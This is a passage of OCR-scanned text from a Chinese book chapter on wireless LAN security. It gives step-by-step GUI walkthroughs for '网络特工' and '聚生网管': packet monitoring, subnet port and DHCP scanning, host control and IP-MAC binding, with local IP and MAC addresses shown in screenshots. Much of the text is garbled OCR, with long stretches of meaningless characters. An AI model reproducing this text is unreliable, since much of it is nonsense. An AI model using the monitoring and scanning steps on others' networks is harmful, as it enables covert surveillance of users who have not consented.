框 ， 在 其 中 对 各 个 选项 卡 进 行 设置 ， 如 下 
图 所 示 。 
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options x 


授 E 器 | 攻 主 | 更 新 | 实则 | 分 折 |ARPft 畦 | 全 六 | 


网 阁下 本 
es [eros tH Gigob ethemet 101007 "eS 
3 [Atheros L1 Gigabit Ethemet 10/100/100( 
了 机 192168.0.104 -| 
子 了 基本 255.255.255.0 了 | 
4 MAC [00-1E-8C-AD-13-5F 
网 关中 192.168.0.1 -| 
网 关 MAC |F4-83-CD-33-60-73 -| 
DNS [61.128.114.134 
61.128.114.167 


列 可 |\Device\NPF {82CAC205-4844-4802-BE93-EC6F26B0D70F) 


局 新 


Cw | ww | nw | 


14.3.3 网络 特工 


网 络 特工 可 以 监视 与 主机 相连 Hub 上 所 
有 机 器 收发 的 数据 包 ; 还 可 以 监视 所 有 无 
线 局 域 网 内 的 机 器 上 网 情况 ， 以 对 非法 用 
户 进 行 管理 ， 并 使 其 登录 指定 的 JP 网址 。 

使 用 网 络 特工 的 具体 操作 步骤 如 下 : 
下 载 并 运行 其 中 的 “网 络 特工 .exe” 
程序 ， 即 可 打开 “网 络 特工 ” 主 窗口 ， 如 下 
图 所 示 。 


3 
zn 二 
| 本 ”区 


J 


一 | 


se 选择 4 工具 ”一 “选项” 菜单 项 ， 


即 可 打开 “选项 ”对 话 框 ， 在 其 中 可 以 设 
置 “启动 ” “全 局 热 键 ”等 属性 ， 如 下 图 
所 示 。 
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选项 x 
自动 「 厅 项 
厂 操作 系统 启动 时 自动 运行 程序 太 退出 程序 时 需要 密码 验证 
你 程序 启动 时 显示 系统 托盘 图 标 克 不 旦 示 广 于 (需要 重新 运行 程序 ) 
人 程序 启动 H 旺 示 主 窗 口 厂 启 加 不 蜡 示 程序 L060 


-全 局 执 键 
显示 /隐藏 主 窗 口 热 键 。 Cel + Shift + At 
厂 热 键 显示 主 窗口 时 需要 密码 验证 


报警 声音 设置 
| 浏览 


bp:\360 安 全 浏览 器 下 载 \ 黑 识 工具 \net_spy\ietSpy\wa 


Ea 


在 “网 络 特 工 ” 主 窗口 左边 的 列表 
中 单 击 “数据 监视 ”选项 ， 即 可 打开 “ 数 
据 监视 ”窗口 。 在 其 中 设置 要 监视 的 内 容 
后 ， 单 击 “ 开 始 监视 ”按钮 ， 即 可 进行 监 
视 ， 如 下 图 所 示 。 


如 ra ram ram ra re nap EE 
r Fn rr 站 32 全 
9 人 
j 


hw 
Lt I 
el 


EE EE: 


step 国 双击 该 网 段 ， 即 可 在 右边 打开 的 窗口 


中 ， 看 到 刚 设置 的 网 段 中 所 有 的 信息 ， 如 下 
图 所 示 。 


oe 酝 [ 


[Eee 四 在 “网 络 特工 ” 主 窗 口 左边 的 列表 中 
右 击 “ 网 络 管理 ”选项 ， 在 弹出 的 快捷 菜 
单 中 选择 “添加 新 网 段 ” 选项， 即 可 打开 
“添加 新 网 段 ” 对 话 框 ， 如 下 图 所 示 。 


添加 新 网 段 x 
网 段 开始 IT 地 址 168 .0 .2 
网 段 结 束 IP 地 址 ; 192 .168 . 0 .253 
网 段子 网 搞 码 [255 .255 .255 .0 
网 自由 关 TP 地 址 ， | 192 .168 .0 1 
ual GE 


[step 图 在 设置 网 络 的 开始 JP 地址 、 结 束 IP 地 
址 、 子 网 掩 码 、 网 关 IP 地 址 之 后 ， 单 击 OK 
按钮 ， 即 可 在 “网 络 特工 ” 主 窗口 左边 的 
“网 络 管理 ”选项 中 看 到 新 添加 的 网 段 ， 
如 下 图 所 示 。 


288 


[step 国 单 击 其 中 的 “管理 参数 设置 ”按钮 ， 
即 可 打开 “管理 参数 设置 ”对 话 框 ， 在 其 
中 对 各 个 网 络 参 数 进行 设置 ， 如 下 图 所 示 。 


Rs x 
ed 
全 cium 二 ma 
官 于 主机 频 蔡 ， 一 一 一 | 一 一 每 10.000 秒 -次 管 下 路 让 撒 | sm ob 
BB 
厂 不遇 有 伐 。。。 忆 便 jp 自己 大 办 人 人 理 上 同 三 密 寺 uc 物 和 地 址 


厂 当 历 分 加 后 丰 从 和 主机 娄 到 入 休 落 掺 或 者 主机 抵 撤 千 时 记忆 特 中 和 官 理 荣 路 
在 司 一 人 bh 志和 大 正六 管理 和 只 


i 日 过 


厂 全 和 过 和 厂 全 外 

未 厂 更 jwcdbitf 示 厂 上 4 志 厂 生物 Wwe 地 址 日志 

TF 厂 管理 反 示 Tat 三 时 6 

me 厂 NB 提示 厂 多加 应 日志 三 NB 吉 

厂 工作 对 扒 示 。。 厂 网 4 昭和 检 示 厂 工作 明 消 息 E 志 。。 厂 网 站 册 身 二 
3 Cer 


Estee 图 单 去 “网 址 映射 列表 ”按钮 ， 即 可 打 
开 “ 网 址 映射 列表 ”对 话 框 ， 如 下 图 所 示 。 
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Rm 可 


机 入 要 向 址 要 输入 het- 7/ ET 
上 有 EE 

请 上 吉 过 择 ms 服 和 器 

I I 

Bt 1 18 

SL 128. 14 167 

于 


了 对 二 让 
下 地 rm 


emt 
趟 各 竺 ne 
rr 


Ty 
[ES 


添加 La 


BBtep 图 在 “DNS 服务 器 IP” 文 本 区 域 中 选 
中 要 解析 的 DNS 服务 器 后 ， 单 击 “ 开 始 解 
析 ” 按 钮 ， 即 可 对 选中 的 DNS 服务 器 进行 
解析 ， 待 解析 完毕 后 ， 即 可 看 到 该 域名 对 
应 的 主机 地 址 等 属性 ， 如 下 图 所 示 。 


Rm 鞭 
ee mm 吉 插 同 阿 ” 了 


Hk | 


LE 
请 上 直达 抒 mYs 用 务 器 : 了 本 sto, pp 
Eo 让 
i od oD 
WbAI 志 
要 庆 册 虹 的 有 上 Ti? C4) TRE 
Wei tae Le 0 1D en 


eat 得 Bamwnw 下 坎 涉 交 miapnat 


Ea La «| 


[Eee 加 在 “网 络 特工 ” 主 窗口 左边 的 列表 中 
单 击 “ 互 联 星空 ”选项 ， 即 可 打开 “互联 
星空 ”窗口 ， 在 其 中 即 可 进行 端口 扫描 和 
DHCP 服 务 扫描 操作 ， 如 下 图 所 示 。 


Gm 


英 口 扫 次 参数 设置 x 
?版 本 : G2 | 协议 类 型 : [TCF ”| 厂 昱 示 扫 指 进 度 
起 始 IF: |192. 168.0.2 
Ce | 
结束 IP: |192. 168. 0.253 Ge 
3 
得 
国 ) 《< 常用 端口 
隐蔽 性 
使 用 WMC 地址 [D1350N13F (大 写 ) 
和 I 地址 [i52150154 进行 扫描 


[step 图 在 设置 起 始 IP 和 结束 IP 之 后 ， 单 击 
“常用 端口 ”按钮 ， 即 可 将 常用 的 端口 显示 
在 “端口 列表 ”文本 区 域内 ， 如 下 图 所 示 。 


甘 口 扫 接 参数 设置 x 
TP 版 本 : |TPv4 ”| 协议 类 型 : [rc ”x] 厂 显示 扫描 进度 
起 始 IF: [192. 168.0.2 
og | 
结束 ITP: [192. 168.0.253 
Cancel | 
21, 23, 25, 53, 80, 110, 135- 
139, 161, 443, 8010, 8080 
强 
隐蔽 性 
使 用 IAC 地 址 001E8CAD135F (大 写 ) | 
和 IF 地 址 [192 1 0 104 进行 扫描 


step 图 单 击 OK 按钮 ， 即 可 进行 端口 扫描 操 
作 ， 在 扫描 的 同时 ， 将 扫描 结果 显示 在 下 
面 的 “上 日志 ”列表 中 ， 在 其 中 即 可 看 到 各 
ib 如 下 图 所 示 。 


Er 


此 本 三 


= [i 


[Eee 可 在 右边 的 列表 中 选择 “端口 扫描 ” 
选项 后 ， 单 击 “ 开 始 ” 按 钮 ， 即 可 打开 
“端口 扫描 参数 设置 ”对 话 框 ， 如 下 图 
所 示 。 


[Step 本 在 “互联 星空 ”窗口 右边 的 列表 中 
选择 “DHCP 服 务 扫描 ”选项 后 ， 单 击 “ 开 
始 ” 按 钮 ， 即 可 进行 DHCP 服 务 扫描 操作 ， 
如 下 图 所 示 。 
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一 


ee 


图 末 生 网 管 过 所 村 去 甘 芭 x 


许可 证 协议 
在 安装 肾 生 网 管 试用 版 之 前 ,请 检阅 授权 条 款 。 


检阅 协议 的 其 余部 分 ， 请 按 [Penn] 往 下 卷 动 页 面 。 


14.4 无 线 局 域 网 安全 辅助 
工具 


面 对 黑 客 针对 无 线 局 域 网 的 种 种 攻 
击 ， 无 线 局 域 网 管理 者 可 以 使 用 局 域 网 安 
全 辅助 工具 来 对 整个 无 线 局 域 网 进行 管 
理 。 本 节 将 介绍 几 款 最 为 经 典 的 局 域 网 畏 
助 软件 ， 以 帮助 大 家 维护 无 线 局 域 网 ， 从 
而 保护 无 线 局 域 网 的 安全 。 


14.4.1 聚 生 网 管 


聚 生 网 管 系统 是 聚 生 科技 在 深入 分 
析 了 主流 无 线 局 域 网 监控 软件 技术 的 基础 
上 ， 经 过 自主 创新 和 不 断 测试 ， 最 终 研发 
成 功 的 一 套 优秀 的 网 络 监 控 软 件 。 在 无 线 
局 域 网 的 任意 一 台 计 算 机 上 安装 该 软件 就 
可 以 控制 整个 无 线 局 域 网 的 P2P 下 载 、 各 种 
聊天 工具 、 股 票 软件 、 游 戏 软件 等 ， 使 得 
网 管 人 员 可 以 在 一 台 控制 机 上 即 可 以 控制 
任意 一 台 无 线 局 域 网 主机 ， 从 而 极 大 地 提 
高 了 工作 效率 。 


1. 安装 聚 生 网 管 


[step 图 双 去 下 载 的 聚 生 网 管 安装 程序 ， 即 可 
打开 “许可 证 协议 ”对 话 框 ， 在 其 中 可 以 
查看 软件 许可 协议 信息 ， 如 下 图 所 示 。 
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i 有 安装 和 使 用 PL 的 用 户 必须 项 足 并 严格 道 守 以 下 各 项 条 教 ， 否 刚 请 和 
停止 安装 、 使 用 和 传播 : 


一 、《 桶 生 网 管 》 受 中 华人 民 共 和 国 着 作 权 法 及 中 国 和 国际 着 作 权 条 约 和 其 它 知 
加 村 及 和 69 人 用 户 不 得 有 任何 侵害 《 聚 生 网 管 相 关 一 切 权利 的 行 


= 、 必 束 生 网 管 产 品 生产 本 、 、 随 附 的 各 种 资料 一 切 所 有 权 和 知识 产权 均 由 大 势 v 


ee 着 ee ON ; 
BR) 


step 图 单 击 “我 接受 ”按钮 打开“ 选 定安 


装 位 置 ”窗口 ， 在 其 中 设置 程序 的 安装 目 
标 文件 夹 ， 如 下 图 所 示 。 


局 天生 网 营 试用 版 去 壬 x 


选 定安 装 位 置 
选 定 聚 生 网 管 试 用 版 要 安装 的 文件 夫 * 


A on 


目标 文件 夹 
[ED 


浏览 (B) 


所 震 空间 : 22. MB 
可 用 空间 : 54. 46B 


< 上 一步 0 取消 (C) 


step 图 单 击 “安装 ”按钮 ， 即 可 开始 安装 聚 


生 网 管 程序 ， 并 显示 安装 的 进度 ， 如 下 图 
所 示 。 


正在 安装 
聚 生 网 管 试用 版 正在 安装 ， 请 等 候 。 
复制 到 : D: \Lan4os\Folicy\ 只 限制 同 络 状 戏 第 略 


显示 细节 (0) 


于 一 上 (| 关闭 ( 到 青 () 


Step 加 安装 完成 后 ， 弹 出 “安装 完成 ” 窗 
口 ， 单 击 “ 关 闭 ” 按 钮 ， 完 成 程序 的 安 
装 ， 如 下 图 所 示 。 


第 14 章 ”无线 局域网 的 安全 防护 


司 要 RE 用 六 寺 一 x 
安装 完成 
和 放生 寺 记 
ES 
二， 和 = 
加 
E=$ 了 中 


2. 聚 生 网 管 的 配置 


在 使 用 聚 生 网 管 这 款 软件 之 前 ， 需 要 
先 对 其 进行 配置 ， 配 置 聚 生 网 管 的 具体 操 
作 步 又 如 下 : 
选择 “开始 ”一 “所 有 应 用 ”一 “ 聚 
生 网 管 ” 菜 单项 ， 即 可 打开 “监控 网 段 配 
置 ” 窗口 ， 如 下 图 所 示 。 


监控 网 后 配置 一 


注 ; 如 果 你 尚未 创建 网 股 , 则 可 以 点 机 “新 如 监控 网 级 ” 即 可 进行 创 
建 } 之 后 你 可 以 双 主 必 入 史记 或 单 主 运 中 内 后 点 主 “ 开 恕 监 福 " 加 可 


在 进行 监控 之 前 ， 需 要 添加 要 监控 的 
网 段 ， 单 击 “新 建 监 控 网 段 ” 按钮 ， 即 可 
打开 “网 段 名 称 ” 对 话 框 ， 如 下 图 所 示 。 


/Rs x 


> 监控 网 段 配置 型 


和 


VIAN 2017081 4182339 


下 : 再 过 经 便 用 SA 网 把 队 /多 出 届 司 尼 网 届 有 二 正 系 上 1 


Ee 训 | | 可 


step 图 在 “请 输入 新 网 段 名 称 ”下 方 的 文本 


框 中 输入 网 段 的 名 称 之 后 ， 单 击 “ 下 一 步 ” 
按钮 ， 即 可 打开 “选择 网 卡 ” 对 话 框 ， 如 下 
图 所 示 。 


到 网卡 EE 


men. 到 


再 为 网 反对 应 的 网 卡 Pr 
Miheros 1 Gigabit Ethermet 10/100/10008are T Contrcllor = 
pl 地， 1921680104 
本 机 NAC 直入 00-1E-8C-AD-13-5F 
FER : 2552552550 
Re 19216801 
i 19216800 加 [EXE 
Macds 二 : 83-CD-33-60-73 tm 


型 Re 速 以 襄 二 “ 术 出 ” 技 条 以 村 二 网 癌 话 接 状况 ; 如 采 最 洛 能 

关 ， 则 党 角 网 络 正 香 可 以 总 柄 下 一 步 所 作 ; 否则 竺 登录 网 关 p 路 由 器 、 

AN NA 只 有 歼 职 正光 的 网 天 MACWB 址 了 
Ei 


“Es®) [2 |] | ww be 
[step 图 为 该 网 段 选择 对 应 的 网 卡 后 ， 单 击 
“下 一 步 ” 按 钮 ， 即 可 打开 “出 口 带宽 ” 
对 话 框 ， 如 下 图 所 示 。 


DER 区 


By 监控 网 段 配置 可 


下 网 自 公 网 出 口 汝 入 天 蜗 : 


< 上 -2B) 可 和 


[stsp 图 在 “本 网 段 公 网 出 口 接 入 带宽 ” 右 仙 
的 下 拉 列 表 中 选择 “Auto Detect (自动 检 
”选项 后 ， 单 击 “ 完 成 ”按钮 ， 将 会 

回 “监控 网 段 配 置 ”窗口 ， 在 其 中 即 可 
RE 


291 


ES 
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监 注 网 段 配置 


要 网 段 名 称 :VLAN_20170814182339-- 单 网 段 
[192.168.0.104-255.255.255.0] 


生 网 管 ” 主 窗口 ， 如 下 图 所 示 。 


国 本 风格 V2016 用 须 网 扣 林 WUAN_2017081418233 引 


Dis Oememn 和 em EE 
口 得 动 北 上 无 二 小 由 器 口 生 动 半 止 手 人 /平反 口 自 办 其 用 随 入 wif 口 训 Lip 


1Pte 直 打 久 及] 。 主机 各 (上 二 司 可 后) 上 行 D 00 KB/S) (J 下 F(0.00 KBAS) 这 天 冰 王 
口 灰 192168.0104 过 000 ooo 


< 


It en: 1 :1 本 汉 :0 


注 : 如 果 你 尚未 创建 网 段 ， 则 可 以 点 主 “ 新 建 监控 网 段 ” 即 可 进行 创 
建 之 后 你 可 以 双 二 监控 网 段 或 单 主 选中 然后 点 主 “ 开 始 监控 ” 即 可 
进入 主 界面 ， 


设置 操作 日 志 显示 访问 关于 升 约 才 且 运 但 协 动 a 
OO.0 ©@ 0 0 0 @ © 全 (eT 
房 劝 管理 扫 栖 主机 配置 第 略 。。 主 局 设 盘 。 友 全 肋 新 。 扩展 揪 件 。 日 志 豆 词 产品 洋 般 。 同 差 对比。 使 月 洒 明 。 条 见 同时 。 访问 言 网 。 将 天 流程 。 联系 2 们 


号 | EE ed 
口 台 NMAC 。 口 只 显示 ,FIMAC 加 定 电 脑 。 口 只 区 许 IPfDMAC 风 定 吧 膨 上 网 


wm 
o0 


> 


大 名 亚 共立 立 险 太 冰 华 全 而 这 于 服气 避 共 去 立 坠 打开， 在 再” 能 大 脱 妇 作 万 册 ， 洋 彤 c 纱 
到 生 网 芝 和 综 国 办 一 寺 全 禁止 志 天 下 载 、 革 上 QQ 尝 戏 、 限 币 D25 网 装机 5 等 


step 较 当 确定 所 配置 的 监控 网 段 信息 准确 无 误 后 ， 单 击 “ 开 始 监控 ”按钮 ， 即 可 打开 “ 聚 


若 起 灰 未 方位 ,一 必 克 用 失 
i 


所 有 用 广 访问 日 志 
访问 时 站 


_ 章 个 开户 访问 日 到 (三 三 机 要 中 香 主 ) 
二 议 弄 。 源 Pi 址 


Dr Ds 
要 二 人， 源 M。 巨 的 P 地 址 。 目的。 沪 问 有 容 


» 
[BS 丫 和 天 时 wifi/wif 共 让 门 检 测 无 尘 洗 贱 / 于 Hi/ 杯 。| 查 痢 
届 辣 52 Phe 处 MACxemE 。 入 还 


a 


@ 移 提示 : 用 户 可 以 根据 需要 建立 多 个 网 段 。 如 果 想 监控 第 二 个 网 段 ， 请 再 次 打开 一 个 聚 
生 网 管 的 窗口 ， 从 中 选择 想 要 建立 的 第 二 个 网 段 ， 然 后 单 击 “ 开 始 监控 ”按钮 即 可 。 


3. 聚 生 网 管 的 使 用 


在 配置 完 聚 生 网 管 要 监控 的 网 段 后 ， 就 可 以 利用 该 工具 对 整个 无 线 局 域 网 进行 管理 ， 


其 具体 操作 步骤 如 下 : 
step 回 在 “ 聚 生 网 管 ? 
在 下 方 的 列表 中 显示 出 来 ， 如 下 图 所 示 。 
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主 窗口 中 ， 单 击 “启动 管 理 ” 按 钮 ， 即 可 扫描 到 所 有 在 线 主 机 ， 并 


第 14 章 “无 线 局 域 网 的 安全 防护 ES 


| 回 村 网 于 Vz016 坛 用 版 网 民生 称 VLAN_20170814182339] - oO x 
| 要 人 日 去 旺 示 访 且 关于 到 帮 向 运 忆 四 风 
OOaeeeeocoeeee ee e bh 
停止 监 皖 5 主 岂 | 醒 要 第 骆 。 全 局 设 千 。 去 全 防 三 。 芳 展 括 件 。 日 去 查询 | 产品 详解 。 司 闫 对比。 使 月 及 。 靠 见 月 三。 访问 宫 网 © ,区 her Celok 
A 

口 全 。 口 see 入 | 林 风 氏 涂 ~ BA | .S| 。 款 轨 58 关中 各 理光 # 居 方 藉 25 夯 U 要 ， 夭 动 更 呈 玉 于 好 等 ,不 史 且 L59 室 村 角 要， 详 屿 而 此 
口 S 英 上 天 顷 虽 由 卉 。。 口 功 芝 上 手机 二 笋 。。 口 和 芝 朋 有志 vi。 口 ] 革 上 村 故 P。。 口 ] 革 上 介 改 MAC 。 口 只 呈 示 PP 和 MAC 即 定 下 脑门 RiciIPRDMAC 交 十 电 用 上 网 

1Pie 址 控制 主机 名 (二 榜 到 | () 上 行 (155.17 KK。 (当下 F0167434 。 连 这 尖 志 所 有 下 户 访 到 二 。 间作 产 访问 志 (在 主机 大寺 音 主 ) Dt Om 

口 枉 192158.0.104 控制 15517 167484 这 六 下 和 Ee if 。 源 p 地 过。 天 机 天 M.。 目的 IP 地 站 。 日 的 -。 访问 内 容 

口 时 1921680112 AFOIG-511211.. 030 ao 这 二 下 到 

品 册 192:168,0.106 DESKTOP-SCV.. 020 000 过话 正 所 

口 显 192.168.0.107 DESKTOP-D5K.. 090 .00 连接 正 党 

口 本 192168.0109 -- oa0 ao 二 FE 

口舌 192168.0108 网 上 和 技 oo om 这 正果 

口 是 192.168.0.114 AFOIG-702111--。 020 .00 连 辽 正 过 

口 是 192158.0102 ~- oog oo Es 

D1021680105 -- oa0 aoo 法 RFE 

口 名 P/MAC 化 口 本 上 ARP 裕 才思 析 和 罗 wihiwifs 划 要 柱 册 下 向 祷 /手持 板 。 下 看 
EE = Pastt MAC 。 了 

< > 

大 可 到 可 文件 络 综 软件 全 而 志 灵 县 于 汪 世 呈 立 险 杂 下 复制 ， 肯 改 ， 脐 豚 扫 作 肿 去 ， 活 层 澡 比 庆生 同时 国 庙 关 知 居 估 二 ， 人 大屋 生得 ， 功 训 直 站 启 W 抽 上 网 首 恬 失 斤 ， 诗 司 志 化 
It 要 He 歼 :9 古寺 :9 丙 活 :0 到 全 网 外 芋 “创新 机 过 ” 半 岁 ， 芝 同 攻 管 理 员工 上 网 行为 果 快 理 ， 最 简单 
[step 图 选中 主机 前 面 的 复 选 框 ， 即 可 开始 控制 并 显示 计算 机 宽带 、 上 网 网 址 或 拦截 日 志 


信息 ， 如 下 图 所 示 。 取 消 选 中 则 所 有 控制 全 部 失效 。 


| 国 可 本 网 各 V2016 芝 用 版 网 展 称 VLAN_20170814182339] -0 x 
| 8 着。 日志 显示 访 月 关于 天 如 天 0 运 和 办 


0.0000000808 80 © © i 


售 上 监 容 二 入 三 内 去 委 防 亲子 慨 括 件 。 日志 机 | 产品 和 争 。 同 关 kb 借用 党 二。 党 见 有 本 。 浪 同 下 问 。 尖 沈 革 。 EX5R 们 篇 坊 有 有 本 考 储 直 太 同 目 
回迁。 口 eam 入 二 .a0 [本 (加 帮 ,网址 。 |。 BA 二 号 出 |。 大雪 至 U58 油 记名 下 的 休 民 方 就 芝 太 亡 ， 夭 动感 于 杂 午 不 昌 有 LU66 必 折 绎 要 ， 济 业 吉 化- 
口 s 计 天线 出 器。 口 ] 全 村 上 手 人 二 概 。。 门生 功 各 及 卫生 wif 站 委 目 人 改口 业 目 从 改 MAC 。 口 ] R 呈 示 P 和 MAC 如 电脑。 癌 ] 只 允许 Ip 和 MAC 扩 和 中 用 上 网 
1P 地 址 ( 打 多 控制 ) 主机 各 (点 主 覆 沿 (所 ) 上 行 .00 X3/S) (车 | 下 (0.00 KB/S) 连接 状态 MACB 直 所 和 用 户 党 间 日 去 。 总 个 尘 户 访 风 日 去 ( 在 主 也 三 中间 二 [mL 
口 村 192.168.0.104 挫 MN 000 oo 过 接 正 守 oo1EeCAD:13sF || wa 区 议 党 型 。 源 Plt 址 。。 源 主 记 源 M.。 日 的 |P 地 址 。 日 | 
D1021680112 arolG-s1i211. 929 am is caacoaecccnl | EIEEEEEEEITTEEIEIIGSEIIEIIGE 
口 时 192168.0106 DEskTop_scVv。 020 Qo0 这 扶正 呈 002324Do86E5 | 2017-8.14199557 WWWiS 1921580107 DES.. SBf. T223212 Bd 
回击 192168.0107 DESKTOP-D5K.。 020 oo 过 下 和 SFB.84fB.5310 1419:95:57 WWWb 同 1921680.107 DES.。 SBf-。 11723279 。 
口 三 1921680109 -- 00 Qo0 这 于 下 村 Tof7zcDa1124 | 2017-8.14190602 WWWiS 1921680107 DFS SB 2183011624 ad 
口 醒 192 168.0.108 网 痢 科 技 000 oo 这 近 正 尘 40AsEFDEA9D3 
口 是 192158.0114 AFOIG-702111.. 020 oo 这 于 C0:CB:36:7D:AG-0E 
口 岂 192168.0"102 一 090 oo0 庄 科 正常 48E5z381701 
口 覃 1921680105 -- 000 oo 流下 EDD:CeCOHA5D 
口 显 192159.0.101 096 00 过 潜 正 亏 A4:44D1:DIAE7E 
口 遇 192.168,0.400 一 1000 000 法 接 正 染 As5E6G1G7TAA1 
口 硕 192.168.0103 一 090 000 连 芒 正二 68:fB:7EEAFCHA | | 

口 tIWMAGSz“ 口 输出 ARF 攻 去 回 检 出 阿 届 vif/wif 共 划 。 加 检测 天线 岳 由 器 生机/ 
2] = IP 直 MACIE 址 。 本 还 
| 环 、 写 堵 、 桥 改 、 竹 卫 绽 作 月 可 ,这 千 吉 比 过 生 岗 营 扫 困 内 c 丘 且 全 三 ， 拓 向 大 兽 ”功能 振 荆 后 的 喇 工 上 万 等 玫 区 毕 ， 洋 傅 吉 此 
居 态 :此 控 He 站: 12 在 生 :1 至 迁 ，1 


[step 图 在 主机 列表 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “控制 全 部 主机 ”菜单 命令 ， 即 可 控 
制 全 部 主机 ， 如 下 图 所 示 。 

[step 国 虽然 可 以 控制 全 部 主机 ， 但 只 是 让 用 户 查 看 带宽 ， 并 没有 对 主机 进行 其 他 的 控制 。 
如 果 想 启用 各 种 控制 (如 下 载 、 聊 天 等 ) ， 双 击 某 台 主机 信息 ， 即 可 弹出 “新 建 策略” 
消息 框 ， 将 看 到 “您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 个 策略 吗 ? ”对 话 框 ， 如 下 图 
所 示 。 
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IP 地 址 各 控制 】 主机 各 (S 二 个 六 (总) 上 全 (21440 K.。 (总 下行 72.59 KB/-- 
口 遇 192.1630104 接 抽 机 oo oo 


EE Fr 
回 遇 192.163.0, 项 坊 当 前 复 络 (P) 000 
回电 192.1630. 为 渤 中 主机 苦瓜 绩 格 (N) 000 
回 题 192.1630，。。 批 坚 托 派 竺 路 D ooo 
回 量 192.163.0. 72.18 
恒 192160 Pn mo oo 
回 是 1921680。 EWP 人 各 由 oo 
回 出 192.163.0、 ri 000 
出 192.163.0, 人 EM) 052 
回 册 192.163.0, EWN 000 
网 192.1630, 


若 要 新 建 策略， 则 需要 单 击 “ 是 ” 按 
人 钮 ， 即 可 打开 “策略 名 ”对 话 框 ， 在 “请 
输入 策略 名 称 ” 文 本 框 中 输入 一 个 策略 的 
名 称 ， 例如“ 局域网 ”， 如 下 图 所 示 。 


条 可 它 X 
清太 筑 玫 名称 E33 
EE ] Ly ml 


[step 较 单 击 “确定 ”按钮 ， 将 打开 “编辑 策 
略 [局 域 网 ] 的 内 容 ” 对 话 框 ， 在 其 中 分 别 设 
置 “ 网 络 限制 ”“ 带 宽 限 制 ”“ 了 P2P 下 载 限 
制 ” “流量 限 制 ”“ 普 通 下 载 限制 ”“ 游 戏 


限制 ”“ 股 票 限 制 ”“ 聊 天 限制 ”“ACI 规 
则 ”“ 时 间 设 置 ” 等 选项 卡 ， 如 下 图 所 示 。 
多 术 二 玫 司 域 台 站 全 家 
日 WTRN 区 fxMPR 关羽  。 志 阳 KR 和 < AcL 需 则 
加 aaas 尖 网 一 类 寺 了 制 [i 


时 P2p 下 载 卫 制 


山 法 县 限制 
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step 了 设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 
即 可 完成 创建 策略 。 单 击 “ 配 置 策略 ” 按 
钮 ,打开 “策略 编辑 ”对 话 框 ， 即 可 看 到 
添加 的 策略 ， 如 下 图 所 示 。 
pe ele chi (也 可 


可 以 坊 辑 、 交 更 这 旦 第 
区 我 们 建议 多 村 主机 和 第 的 对 
应 关系 导出 各 全 丰 “ 主 机 列表 ”大 古 上 角 ) EN 


x 


[Ee OR 

人 asmesase ES 
Er 

© rss 

€ res 

人 sass 

© -san 


CY ss my 


OR mt. 

建立 好 策略 后 ， 用 户 可 以 在 主机 列表 
窗 格 中 ， 双 击 其 他 “未 指派 策略 ”的 主机 指 
派 已 经 建 好 的 策略 ， 也 可 以 再 建 一 个 新 的 策 
略 。 若 想 再 建 一 个 策略 ， 双 击 该 台 主 机 ， 
弹出 “您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 
个 策略 吗 ? ”对 话 框 ， 如 下 图 所 示 。 


桶 生 网 管 V2016 


共 


和 @ 个 已 公 定义 过 第 聊 ,现在 经 经 新 建 一 个 征 隔 芭 ? 


Ew Ew 


[Ste 图 单 去 “是 ”按钮 ， 可 以 继续 新 建 一 个 
策略 ; 而 单 击 “ 否 ”按钮 ， 将 弹出 “重新 
指派 策略 ”对 话 框 ， 可 以 重新 指派 刚才 定 
义 的 策略 ， 或 者 仍旧 保持 “未 指派 策略 ?” 
状态 ， 设 置 完 成 后 单 击 “ 确 定 ” 按 钮 ， 即 
可 成 功 设 置 指派 策略 ， 如 下 图 所 示 。 


[Step 匡 如 果 想 对 所 有 的 主机 或 者 一 部 分 主机 
都 应 用 同一 个 策略 ， 要 在 “ 聚 生 网 管 ” 主 

机 列表 窗 格 中 右 击 ， 在 弹出 的 快捷 菜单 中 
选择 “批量 指派 策略 ”菜单 命令 ， 如 下 图 
所 示 。 


| 
口 本 192168.0104 过 Si o0 Ol2 
口 


口 时 19zesotos to 
ET ( 。 庆 


[step 图 打开 “策略 指派 设置 ”对 话 框 ， 左 右 
两 侧 分 别 为 已 经 指派 策略 的 主机 和 未 指派 
策略 的 主机 ， 用 户 可 以 把 其 中 的 一 个 已 经 
建立 好 策略 的 组 或 未 建立 策略 的 组 里 面 的 
所 有 主机 ， 全 部 指派 到 右 侧 的 菜 个 策略 组 
里 面 或 未 指派 的 策略 组 里 面 ; 右 侧 的 同样 
也 可 以 指派 到 左 侧 的 组 里 面 ， 如 下 图 所 示 。 


i x 
请 过 示人 由 be 
i Rd 
PlaniE EN : Ee 
[3 1 En A 
Weep) iconesanz rosenanoss 
-中 92.1680.106 DESKTOP-SCVENG| 
EE 192,1680.107 oC DESKTOP-DSKFSE 
< | 192.1680109 
一 ”| eneaone hfolG-To21N221 
19p16R0107 
1921680105 
1921680101 
oo = 


证 + 一 息 下 G 下 贡 罕 四 反 汉 “未 安民 丘 浇 ，， 则 呈 二 拆 有 直入 条 的 主 机 ， 然 下 下 过 的 下 这 括 因 攻 加 迁 闪 全 公 
et, WE PRR ER, EAT Ee 可 村 “全 醒 。 ,JE 王 趟 守 示 
于 所 起 林 被 一 众人 天 于 位 和 也 芭 寻 条， 


[step 图 在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 安 
全 防御 ”按钮 ， 在 弹出 的 下 拉 列 表 中 选择 
“IP-MAC 绑 定 ” 选 项 ， 打 开 “IP-MAC 绑 
定 ” 对 话 框 ， 在 其 中 可 以 设置 IP-MAC 绑 定 ， 


如 下 图 所 示 。 
[CIR x 
Deep ucsage 
有 2 
二 se 区- RES 99 
EE 3 MAC 地 直 E23 NP MA 
ST 
er 
esses | 
Suracs 
Ee 
Sasowcs 
ER 
| 
口 S sp -MACeEFel . T+ 机 公 丙 汪 皖 
| 
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[Step 图 单 击 “获取 IP-MAC 关 系 ” 按 钮 ， 即 
可 在 左 侧 的 窗 格 中 显示 获取 的 I[P-MAC 关 
系列 表 信 息 ， 然 后 通过 单 击 “ 手 工 添加 绑 
定 ” 按 钮 进行 IP-MAC 关 系 的 绑 定 操作 ， 如 
下 图 所 示 。 


国 PMAcs x 
ep-MAcitiie 

ET 志和 所 由 有 和 寺 、 玉 尖 和 攻克 .pVAC 突 

ES ER 

Er En Mac ET PMACX 素 

图 Arols-611-，1921680112 Cai0003CCCD1 AFOIG-611211054 FT 

圆 ossxrop 5 1921680106 002324D986&5 DESKTOP-SCV8. pr 

